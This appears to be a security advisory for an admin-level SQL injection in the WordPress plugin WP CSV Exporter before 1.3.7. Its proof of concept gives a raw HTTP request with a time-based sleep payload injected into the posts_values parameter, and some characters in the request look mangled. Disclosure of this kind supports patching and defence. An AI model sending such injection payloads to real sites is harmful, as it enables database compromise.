WP CSV Exporter < 1.3.7 - Admin+ SQLi

The plugin does not properly sanitise and escape some parameters before using them in a SQL statement, allowing high privilege users such as admin to perform SQL injection attacks

PoC

As an admin, go to Tools > CSV Export, leave everything as default and click on Export POSTS CSV Intercept the request made and change the posts_values%5B%5D=post_name to posts_values%5B%5D=post_name%2c(selectfrom(select(sleep(5)))a) This will delay the response of 5s Raw request: POST /wp-content/plugins/wp-csv-exporter/admin/download.php HTTP/1.1 Cookie: [admin+] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 272 Upgrade-Insecure-Requests: 1 Connection: close _wpnonce=7d0447e58b&post;_id=post_id&type;=post&posts;_values%5B%5D=post_name%2c(selectfrom(select(sleep(5)))a)&posts;_values%5B%5D=7*7&posts;_values%5B%5D=post_content&post;_status%5B%5D=publish&limit;=0&offset;=0&order;_by=DESC&post;_date_from=&post;_date_to=&post;_modified_from=&post;_modified_to=&string;_code=UTF-8